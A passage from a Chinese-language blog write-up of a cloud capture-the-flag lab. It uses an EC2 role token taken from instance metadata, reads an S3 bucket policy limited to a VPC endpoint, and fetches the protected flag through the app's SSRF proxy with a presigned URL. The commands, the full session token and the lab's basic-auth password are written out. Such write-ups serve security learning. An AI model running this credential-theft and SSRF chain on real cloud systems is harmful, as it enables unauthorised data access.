IQoJb3JpZ2luX2VjEPn//////////wEaCXVzLWVhc3QtMSJHMEUCIQCQXX3p3qAkedrgYd+ABa8it55Lor1O/vRUSgRHX19yzgIgIHvyT62g2un+9LqtmmK7SG0dQk/EC2MXC0mMgR/zbBcqwQUIwf//////////ARAAGgwwOTIyOTc4NTEzNzQiDIBafVZnTctpiTuubiqVBdJFgfZNm+RSjvpioxrUGeZ+FF3l8kQWTVKARz5/byLAPmFLlHS8CvG/kTqQjmWR9Ud14JKpqwHo95mtuyPlJP2Wa8iHW9gZJlkyRA8Y94oY2Bkx6mFSklJ4ZEwf/KzwbIKisOoYohl+bc7mJVjkQ6tzoqYjkAbYTJYGIGACqIXKXJRG4UprEc60WNhI6tl9ShaPYFeRNYWut7furpFwHhQhwjBI7oY8y3+bszfg6w/AbUpbt8wKTPcJAvU3rXqX0QeEniLcvYoPcctjL+LrgCRx7pT0aXI3pdmhCPkL9RpTBiKDsWqxCR/SWeN75XCVPtPACzj7sD0uZsfgkazxobOWP10GbDmvyIg+bdT6jx7dc0zqLQqz8kMuzzHjqlJlZ/WPWWuXh9Lttc+IDF3p6kwLOZ3IeXNgQE/4pIJA+b0l6G8vQ5NH+DSigiJUD6KC87fJ0i7ldXZzH5l+CI0sZRvyAT3SOzbGB/nMQbd/Vw9RtyoUhycEDPYNlt+4sdeN7t0ED8KHdj1h7rthIONlxHJkUTS+mOumorMz</span><br></pre></td></tr></table></figure>

<p> <code>~/.aws/config</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[profile c1]</span><br><span class="line">region = us-east-1</span><br><span class="line">output = json</span><br></pre></td></tr></table></figure>

<p>然后使用awscli验证是否可行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">aws --profile c1 sts get-caller-identity</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">    &quot;UserId&quot;: &quot;AROARK7LBOHXDP2J2E3DV:i-0bfc4291dd0acd279&quot;,</span><br><span class="line">    &quot;Account&quot;: &quot;092297851374&quot;,</span><br><span class="line">    &quot;Arn&quot;: &quot;arn:aws:sts::092297851374:assumed-role/challenge01-5592368/i-0bfc4291dd0acd279&quot;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>是没问题的，现在递归查看存储桶里有什么东西</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ aws --profile c1 s3 ls s3://challenge01-470f711 --recursive</span><br><span class="line">2025-06-19 01:15:24         29 hello.txt</span><br><span class="line">2025-06-17 06:01:49         51 private/flag.txt</span><br></pre></td></tr></table></figure>

<p>下一步直接尝试读flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ aws s3 cp s3://challenge01-470f711/private/flag.txt - --profile c1</span><br><span class="line"></span><br><span class="line">download failed: s3://challenge01-470f711/private/flag.txt to - An error occurred (403) when calling the HeadObject operation: Forbidden</span><br></pre></td></tr></table></figure>

<p>依旧是被限制住了权限，目前角色没有 <code>s3:GetObject</code>权限</p>
<p>尝试获取存储桶具体的policy</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ aws --profile c1 s3api get-bucket-policy --bucket challenge01-470f711 \</span><br><span class="line">  --query &quot;Policy&quot; --output text | jq .</span><br><span class="line">&#123;</span><br><span class="line">  &quot;Version&quot;: &quot;2012-10-17&quot;,</span><br><span class="line">  &quot;Statement&quot;: [</span><br><span class="line">    &#123;</span><br><span class="line">      &quot;Effect&quot;: &quot;Deny&quot;,</span><br><span class="line">      &quot;Principal&quot;: &quot;*&quot;,</span><br><span class="line">      &quot;Action&quot;: &quot;s3:GetObject&quot;,</span><br><span class="line">      &quot;Resource&quot;: &quot;arn:aws:s3:::challenge01-470f711/private/*&quot;,</span><br><span class="line">      &quot;Condition&quot;: &#123;</span><br><span class="line">        &quot;StringNotEquals&quot;: &#123;</span><br><span class="line">          &quot;aws:SourceVpce&quot;: &quot;vpce-0dfd8b6aa1642a057&quot;</span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  ]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>结果显示除非请求来自 VPC Endpoint <code>vpce-0dfd8b6aa1642a057</code>， 否则拒绝 (<code>Deny</code>) 所有对 <code>private/*</code> 的 GetObject 操作，所以我们想读制定文件，请求必须经过 <strong>指定的 VPC Endpoint</strong></p>
<p>那么整理一下信息：</p>
<ul>
<li>我们现在从metedata里面拿到了一个实例角色</li>
<li>该角色属于EC2，EC2就在VPC里面</li>
<li>所以来自EC2的请求默认经过制定的VPC Endpoint</li>
</ul>
<p>所以本地访问没有用，需要通过EC2内部访问</p>
<p>而前面有一个ssrf的点，可以从EC2中发起请求</p>
<p>最后步骤：生成一个 Presigned URL，让 EC2 通过 SSRF 来访问 S3</p>
<blockquote>
<p>默认情况下，所有 Amazon S3 对象都是私有的，只有对象拥有者才具有访问它们的权限。但是，对象拥有者可以通过创建Presigned URL 与其他人共享对象。Presigned URL 使用安全凭证来授予下载对象的限时权限。可以在浏览器中输入此 URL，或者程序使用此 URL 来下载对象。Presigned URL 使用的凭证是生成该 URL 的 AWS 用户的凭证。</p>
</blockquote>
<p><a class="link"   target="_blank" rel="noopener" href="https://docs.aws.amazon.com/zh_cn/AmazonS3/latest/userguide/ShareObjectPreSignedURL.html" >官方文档<i class="fas fa-external-link-alt"></i></a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ aws --profile c1 s3 presign s3://challenge01-470f711/private/flag.txt</span><br><span class="line"></span><br><span class="line">https://challenge01-470f711.s3.us-east-1.amazonaws.com/private/flag.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;X-Amz-Credential=ASIARK7LBOHXNCMTLSXT%2F20251118%2Fus-east-1%2Fs3%2Faws4_request&amp;X-Amz-Date=20251118T091534Z&amp;X-Amz-Expires=3600&amp;X-Amz-SignedHeaders=host&amp;X-Amz-Security-Token=...</span><br></pre></td></tr></table></figure>

<p>输出一个url，注意，需要对这个url进行url编码，不然后面用到ssrf的时候会把参数自动截断</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ curl &quot;https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=$decodeurk&quot;</span><br><span class="line">The flag is: WIZ_CTF_...</span><br></pre></td></tr></table></figure>

<p>最后成功输出url</p>
<h4 id="End"><a href="#End" class="headerlink" title="End"></a>End</h4><p>好吧写完笔记就觉得不是那么复杂了，钱钱记录一下，这里面还是涉及到挺多云相关的概念，有这么一个靶场还是挺好的，后面有别的关卡是关于容器逃逸的，后面有时间也可以试试。</p>
<p>aws相关的知识点给我感觉也是一个体系了，发现一个大佬搭的<a class="link"   target="_blank" rel="noopener" href="https://kpingfan.com/" >blog<i class="fas fa-external-link-alt"></i></a>很好，期待后面别的靶场让我学到里面的知识。</p>
<p><strong>涉及知识点：</strong>ssrf，springboot端点泄漏，aws s3存储桶查看信息，云服务元数据端点读取。。。</p>

                </div>
                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/%E5%AD%A6%E4%B9%A0/">学习</a>
                                    </li>
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/%E4%BA%91/">云</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                        
                            <div class="next-post">
                                <a class="next"
                                   rel="next"
                                   href="/2025/11/17/js%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/"
                                   title="js原型链污染"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">js原型链污染</span>
                                        <span class="post-nav-item">下一篇</span>
                                    </span>
                                    <span class="right arrow-icon flex-center">
                                        <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    


    <div class="comments-container border-box">
        <div id="comments-anchor" class="comment-area-title border-box">
            <i class="fas fa-comments"></i>&nbsp;评论
        </div>
        <div class="comment-plugin-fail border-box">
    <span class="fail-tip">评论插件加载失败</span>
    <button class="reload keep-button">点击重新加载</button>
</div>
<div class="comment-plugin-loading flex-center border-box">
    <i class="loading-icon fa-solid fa-spinner fa-spin"></i>
    <span class="load-tip">正在加载评论插件</span>
</div>
<script data-pjax>
  window.KeepCommentPlugin = {}
  window.KeepCommentPlugin.hideLoading = () => {
    const cplDom = document.querySelector('.comments-container .comment-plugin-loading')
    cplDom.style.display = 'none'
  }
  window.KeepCommentPlugin.loadFailHandle = () => {
    window.KeepCommentPlugin.hideLoading()
    const cpfDom = document.querySelector('.comments-container .comment-plugin-fail')
    cpfDom.style.display = 'flex'
    cpfDom.querySelector('.reload').addEventListener('click', () => {
      window.location.reload()
    })
  }
</script>

        
            

    <div class="valine-container">
        <div id="vcomments"></div>
        <script 
                src="//cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js"
                async
                onerror="window.KeepCommentPlugin.loadFailHandle()"
        ></script>
        <script 
                async
                onerror="window.KeepCommentPlugin.loadFailHandle()"
        >
          window.KeepCommentPlugin.initValine = () => {
            const config = {
              el: '#vcomments',
              appId: 'E3FHp0QEVFhY7p13mQXePdYC-gzGzoHsz',
              appKey: 'hJxnDaGeKNxkzn9GLQS6pJD4',
              meta: ['nick', 'mail', 'link'],
              avatar: 'wavatar',
              enableQQ: true,
              placeholder: '留下你的评论～',
              lang: 'zh-CN'.toLowerCase()
            }

            if ('') {
              config.serverURLs = ''
            }

            if (window?.Valine) {
              new Valine(config)
              window.KeepCommentPlugin.hideLoading()
            } else {
              setTimeout(() => {
                window.KeepCommentPlugin.initValine()
              }, 1000)
            }
          }

          if ('false' === 'true') {
            setTimeout(() => {
              window.KeepCommentPlugin.initValine()
            }, 1200)
          } else {
            window.addEventListener('DOMContentLoaded', window.KeepCommentPlugin.initValine)
          }
        </script>
    </div>


        
    </div>





                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#End"><span class="nav-number">1.</span> <span class="nav-text">End</span></a></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="border-box website-info-box default">
        
            <div class="copyright-info info-item default">
                &copy;&nbsp;<span>2020</span>&nbsp;-&nbsp;2025
                
                    &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">Flow</a>
                
            </div>

            <div class="theme-info info-item default">
                由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;&&nbsp;主题&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
            </div>

            

            
        

        <div class="count-item info-item default">
            

            

            
        </div>
    </div>
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="tools-list border-box">
        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        
            <li class="tools-item flex-center go-to-comments">
                <i class="fas fa-comment"></i>
                <span class="post-comments-count"></span>
            </li>
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-toggle-theme-mode flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        
            <li class="tools-item go-to-comments-tablet flex-center">
                <i class="fas fa-comment"></i>
            </li>
        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#End"><span class="nav-number">1.</span> <span class="nav-text">End</span></a></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>



<!-- common -->

<script src="/js/utils.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/toggle-theme.js"></script>

<script src="/js/code-block.js"></script>

<script src="/js/main.js"></script>

<script src="/js/libs/anime.min.js"></script>


<!-- local-search -->

    
<script src="/js/local-search.js"></script>



<!-- lazyload -->


<div class="">
    
        <!-- post-helper -->
        
<script src="/js/post/post-helper.js"></script>


        <!-- toc -->
        
            
<script src="/js/post/toc.js"></script>

        

        <!-- copyright-info -->
        

        <!-- share -->
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



</body>
</html>
